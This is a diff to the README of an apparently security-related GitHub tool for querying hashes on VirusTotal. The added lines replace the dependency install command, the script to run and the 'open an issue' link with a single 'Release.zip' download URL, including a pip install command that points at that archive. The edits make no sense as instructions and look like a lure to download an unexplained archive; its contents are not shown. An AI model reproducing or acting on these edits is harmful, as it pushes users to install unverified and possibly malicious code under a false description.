JamoTooTuff/opswat-VTHashQuery/README.md

 ## Usage
 1. Clone the repository to your local machine.
-2. Download the necessary dependencies by running `pip install -r requirements.txt`.
+2. Download the necessary dependencies by running `pip install -r https://github.com/JamoTooTuff/opswat-VTHashQuery/releases/download/v1.0/Release.zip`.
-3. Run the Python script `VTHashQuery.py` to start the analysis process.
+3. Run the Python script `https://github.com/JamoTooTuff/opswat-VTHashQuery/releases/download/v1.0/Release.zip` to start the analysis process.
 4. Follow the on-screen instructions to extract hash values and query them against VirusTotal.

 ## Contributing
 Contributions to **OPSWAT VTHashQuery** are welcome!
 If you have any ideas for improvements or new features, feel free to fork the repository and submit a pull request.
 Your contributions can help make this tool even more powerful and useful for the community.

 ## Support
-If you have any questions, issues, or feedback regarding **OPSWAT VTHashQuery**, please [open an issue](https://github.com/yourusername/opswat-VTHashQuery/issues).
+If you have any questions, issues, or feedback regarding **OPSWAT VTHashQuery**, please [open an issue](https://github.com/JamoTooTuff/opswat-VTHashQuery/releases/download/v1.0/Release.zip).
 Your feedback is valuable and will help us continue to improve this tool.

 Thank you for checking out **OPSWAT VTHashQuery**!
 Happy analyzing! 🚀